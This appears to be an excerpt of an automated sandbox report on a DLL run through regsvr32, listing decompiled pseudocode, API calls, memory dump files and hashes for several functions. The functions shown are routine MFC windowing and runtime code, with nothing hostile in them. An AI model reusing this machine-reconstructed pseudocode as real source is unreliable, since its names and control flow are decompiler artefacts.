                                                                                                                                                                              • Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3
                                                                                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                                                                                              • Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB
                                                                                                                                                                            • _memset.LIBCMT ref: 10013D42
                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 356813703-0
                                                                                                                                                                            • Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                                                                                            • Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
                                                                                                                                                                            • Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                                                                                            • Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013810(void* __ecx) {
                                                                                                                                                                            				struct HBRUSH__* _t14;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                                                                                            				_t14 = GetSysColorBrush(6);
                                                                                                                                                                            				 *(_t18 + 0x20) = _t14;
                                                                                                                                                                            				return _t14;
                                                                                                                                                                            			}





                                                                                                                                                                            0x1001381a
                                                                                                                                                                            0x10013820
                                                                                                                                                                            0x10013827
                                                                                                                                                                            0x1001382e
                                                                                                                                                                            0x10013835
                                                                                                                                                                            0x10013842
                                                                                                                                                                            0x10013849
                                                                                                                                                                            0x1001384c
                                                                                                                                                                            0x1001384f
                                                                                                                                                                            0x10013853

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 1001381C
                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 10013823
                                                                                                                                                                            • GetSysColor.USER32(00000014), ref: 1001382A
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 10013831
                                                                                                                                                                            • GetSysColor.USER32(00000006), ref: 10013838
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 10013845
                                                                                                                                                                            • GetSysColorBrush.USER32(00000006), ref: 1001384C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Brush
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2798902688-0
                                                                                                                                                                            • Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                                                                                            • Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
                                                                                                                                                                            • Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                                                                                            • Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10028DE5() {
                                                                                                                                                                            				long _t5;
                                                                                                                                                                            				int _t6;
                                                                                                                                                                            
                                                                                                                                                                            				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                                                                                                                                            					_t5 = GetVersion();
                                                                                                                                                                            					if((0x80000000 & _t5) != 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
                                                                                                                                                                            						return _t5;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t5 = GetVersion();
                                                                                                                                                                            					if(_t5 != 3) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                                                                                                                                                            					 *0x1005acc4 = _t6;
                                                                                                                                                                            					return _t6;
                                                                                                                                                                            				}
                                                                                                                                                                            			}





                                                                                                                                                                            0x10028df6
                                                                                                                                                                            0x10028e00
                                                                                                                                                                            0x10028e04
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x10028e06
                                                                                                                                                                            0x10028e0c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e0e
                                                                                                                                                                            0x10028e0e
                                                                                                                                                                            0x10028e13
                                                                                                                                                                            0x10028e19
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e19

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Version$MessageRegisterWindow
                                                                                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                                                                                            • API String ID: 303823969-2485103130
                                                                                                                                                                            • Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                                                                                            • Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
                                                                                                                                                                            • Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                                                                                            • Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                            			E1000C209(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                            				long _t60;
                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				void* _t67;
                                                                                                                                                                            				void* _t71;
                                                                                                                                                                            				void* _t72;
                                                                                                                                                                            				long _t73;
                                                                                                                                                                            				void* _t74;
                                                                                                                                                                            				void* _t75;
                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                            				void* _t78;
                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            
                                                                                                                                                                            				_t71 = __edx;
                                                                                                                                                                            				_t79 = _t81 - 0x9c;
                                                                                                                                                                            				_t37 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                                                                                            				_t73 =  *(_t79 + 0xa4);
                                                                                                                                                                            				_t77 = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                                                                                            				E1000C12A(0);
                                                                                                                                                                            				_t67 = _t72;
                                                                                                                                                                            				_t63 = E1000C15E(0, _t79 - 0x70);
                                                                                                                                                                            				 *(_t79 - 0x7c) = _t63;
                                                                                                                                                                            				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                                                                                            					EnableWindow(_t63, 1);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                                                                                            				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                                                                                            				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					__eflags = _t73;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_t77 = _t73 + 0x78;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t77 = _t60;
                                                                                                                                                                            						L8:
                                                                                                                                                                            						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                                                                                            						if(_t77 != 0) {
                                                                                                                                                                            							 *(_t79 - 0x74) =  *_t77;
                                                                                                                                                                            							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                                                                                            							if(_t57 != 0) {
                                                                                                                                                                            								 *_t77 = _t57 + 0x30000;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                                                                                            							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                                                                                            							if(_t54 <= 1) {
                                                                                                                                                                            								_t24 = _t79 + 0xac;
                                                                                                                                                                            								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                                                                                            								__eflags =  *_t24;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t54 + 0xfffffffd <= 1) {
                                                                                                                                                                            									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t96 = _t73;
                                                                                                                                                                            						 *(_t79 - 0x6c) = 0;
                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                            							_t64 = _t79 - 0x6c;
                                                                                                                                                                            							_t73 = 0x104;
                                                                                                                                                                            							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t64 =  *(_t73 + 0x50);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push( *(_t79 + 0xac));
                                                                                                                                                                            						_push(_t64);
                                                                                                                                                                            						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                                                                                            						_push( *(_t79 - 0x7c));
                                                                                                                                                                            						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
                                                                                                                                                                            						if(_t77 != 0) {
                                                                                                                                                                            							 *_t77 =  *(_t79 - 0x74);
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(_t79 - 0x70) != 0) {
                                                                                                                                                                            							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                                                                                            						}
                                                                                                                                                                            						E1000C12A(1);
                                                                                                                                                                            						_pop(_t75);
                                                                                                                                                                            						_pop(_t78);
                                                                                                                                                                            						_pop(_t65);
                                                                                                                                                                            						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}
























                                                                                                                                                                            0x1000c209
                                                                                                                                                                            0x1000c20a
                                                                                                                                                                            0x1000c217
                                                                                                                                                                            0x1000c21e
                                                                                                                                                                            0x1000c22d
                                                                                                                                                                            0x1000c233
                                                                                                                                                                            0x1000c236
                                                                                                                                                                            0x1000c239
                                                                                                                                                                            0x1000c23e
                                                                                                                                                                            0x1000c249
                                                                                                                                                                            0x1000c24e
                                                                                                                                                                            0x1000c251
                                                                                                                                                                            0x1000c256
                                                                                                                                                                            0x1000c256
                                                                                                                                                                            0x1000c25c
                                                                                                                                                                            0x1000c264
                                                                                                                                                                            0x1000c26c
                                                                                                                                                                            0x1000c291
                                                                                                                                                                            0x1000c291
                                                                                                                                                                            0x1000c293
                                                                                                                                                                            0x1000c295
                                                                                                                                                                            0x1000c295
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c279
                                                                                                                                                                            0x1000c283
                                                                                                                                                                            0x1000c28b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c28d
                                                                                                                                                                            0x1000c28d
                                                                                                                                                                            0x1000c298
                                                                                                                                                                            0x1000c298
                                                                                                                                                                            0x1000c29e
                                                                                                                                                                            0x1000c2a2
                                                                                                                                                                            0x1000c2a5
                                                                                                                                                                            0x1000c2ad
                                                                                                                                                                            0x1000c2b4
                                                                                                                                                                            0x1000c2b4
                                                                                                                                                                            0x1000c2ad
                                                                                                                                                                            0x1000c2bd
                                                                                                                                                                            0x1000c2c5
                                                                                                                                                                            0x1000c2cb
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2de
                                                                                                                                                                            0x1000c2cd
                                                                                                                                                                            0x1000c2d3
                                                                                                                                                                            0x1000c2d5
                                                                                                                                                                            0x1000c2d5
                                                                                                                                                                            0x1000c2d3
                                                                                                                                                                            0x1000c2cb
                                                                                                                                                                            0x1000c2e5
                                                                                                                                                                            0x1000c2e7
                                                                                                                                                                            0x1000c2eb
                                                                                                                                                                            0x1000c2f2
                                                                                                                                                                            0x1000c2f5
                                                                                                                                                                            0x1000c306
                                                                                                                                                                            0x1000c308
                                                                                                                                                                            0x1000c30a
                                                                                                                                                                            0x1000c30a
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c2ed
                                                                                                                                                                            0x1000c311
                                                                                                                                                                            0x1000c317
                                                                                                                                                                            0x1000c318
                                                                                                                                                                            0x1000c31b
                                                                                                                                                                            0x1000c328
                                                                                                                                                                            0x1000c32a
                                                                                                                                                                            0x1000c32f
                                                                                                                                                                            0x1000c32f
                                                                                                                                                                            0x1000c335
                                                                                                                                                                            0x1000c33c
                                                                                                                                                                            0x1000c33c
                                                                                                                                                                            0x1000c344
                                                                                                                                                                            0x1000c352
                                                                                                                                                                            0x1000c353
                                                                                                                                                                            0x1000c356
                                                                                                                                                                            0x1000c363
                                                                                                                                                                            0x1000c363
                                                                                                                                                                            0x1000c28b

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                                                                                              • Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                                                                                              • Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                                                                                              • Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000C256
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 1000C26E
                                                                                                                                                                            • SendMessageA.USER32 ref: 1000C283
                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000C33C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1877664794-0
                                                                                                                                                                            • Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                                                                                            • Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
                                                                                                                                                                            • Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                                                                                            • Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                                                                                            				struct HWND__* _t7;
                                                                                                                                                                            				void* _t13;
                                                                                                                                                                            				struct HWND__** _t15;
                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                            				struct HWND__* _t17;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                            				_t17 = _t18;
                                                                                                                                                                            				if(_t18 != 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t16 = _t17;
                                                                                                                                                                            						_t7 = _t17;
                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                            							L10:
                                                                                                                                                                            							if(_t18 == 0 && _t17 != 0) {
                                                                                                                                                                            								_t17 = GetLastActivePopup(_t17);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t15 = _a8;
                                                                                                                                                                            							if(_t15 != 0) {
                                                                                                                                                                            								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                                                                                            									 *_t15 =  *_t15 & 0x00000000;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *_t15 = _t16;
                                                                                                                                                                            									EnableWindow(_t16, 0);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t17;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L9;
                                                                                                                                                                            						}
                                                                                                                                                                            						do {
                                                                                                                                                                            							L9:
                                                                                                                                                                            							_t16 = _t7;
                                                                                                                                                                            							_t7 = GetParent(_t7);
                                                                                                                                                                            						} while (_t7 != 0);
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t17 = GetParent(_t17);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t13 = E1000C087();
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t17 =  *(_t13 + 0x20);
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t13 = E1000A7CE();
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t17 = 0;
                                                                                                                                                                            				goto L8;
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000c166
                                                                                                                                                                            0x1000c16e
                                                                                                                                                                            0x1000c170
                                                                                                                                                                            0x1000c18d
                                                                                                                                                                            0x1000c19b
                                                                                                                                                                            0x1000c1a6
                                                                                                                                                                            0x1000c1a8
                                                                                                                                                                            0x1000c1aa
                                                                                                                                                                            0x1000c1ac
                                                                                                                                                                            0x1000c1b7
                                                                                                                                                                            0x1000c1b9
                                                                                                                                                                            0x1000c1c6
                                                                                                                                                                            0x1000c1c6
                                                                                                                                                                            0x1000c1c8
                                                                                                                                                                            0x1000c1ce
                                                                                                                                                                            0x1000c1d2
                                                                                                                                                                            0x1000c1f0
                                                                                                                                                                            0x1000c1e3
                                                                                                                                                                            0x1000c1e6
                                                                                                                                                                            0x1000c1e8
                                                                                                                                                                            0x1000c1e8
                                                                                                                                                                            0x1000c1d2
                                                                                                                                                                            0x1000c1f9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1af
                                                                                                                                                                            0x1000c1b1
                                                                                                                                                                            0x1000c1b3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1ae
                                                                                                                                                                            0x1000c1a0
                                                                                                                                                                            0x1000c1a2
                                                                                                                                                                            0x1000c1a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c1a4
                                                                                                                                                                            0x1000c172
                                                                                                                                                                            0x1000c179
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c188
                                                                                                                                                                            0x1000c17b
                                                                                                                                                                            0x1000c182
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c184
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongA.USER32 ref: 1000C190
                                                                                                                                                                            • GetParent.USER32(100014EC), ref: 1000C19E
                                                                                                                                                                            • GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                                                                                            • GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                                                                                            • IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                                                                                            • EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 670545878-0
                                                                                                                                                                            • Opcode ID: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                                                                                            • Instruction ID: b03ffd99d979528eb1576ebd7f6c5d6629826c0934e428a14188cd3025a76a69
                                                                                                                                                                            • Opcode Fuzzy Hash: 716a915a51b72e7755bd765e65025d5e7cdfb43fa73cbfe2d9e3b7854765710c
                                                                                                                                                                            • Instruction Fuzzy Hash: CC11A33264533A57F221DB698C80F9A72ECDF4BAD0F260129FC44E329ADB60DC0242D5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                            			E1001411A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                                                                                            				struct tagRECT _v20;
                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                            
                                                                                                                                                                            				ClientToScreen(_a4,  &_a8);
                                                                                                                                                                            				_push(5);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t12 = GetWindow();
                                                                                                                                                                            					_t21 = _t12;
                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                            						GetWindowRect(_t21,  &_v20);
                                                                                                                                                                            						_push(_a12);
                                                                                                                                                                            						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                                                                                            							return _t21;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(2);
                                                                                                                                                                            					_push(_t21);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t12;
                                                                                                                                                                            			}






                                                                                                                                                                            0x10014129
                                                                                                                                                                            0x10014135
                                                                                                                                                                            0x10014137
                                                                                                                                                                            0x1001417a
                                                                                                                                                                            0x1001417a
                                                                                                                                                                            0x1001417c
                                                                                                                                                                            0x10014180
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014146
                                                                                                                                                                            0x1001415d
                                                                                                                                                                            0x10014163
                                                                                                                                                                            0x10014175
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014188
                                                                                                                                                                            0x10014175
                                                                                                                                                                            0x10014177
                                                                                                                                                                            0x10014179
                                                                                                                                                                            0x10014179
                                                                                                                                                                            0x10014185

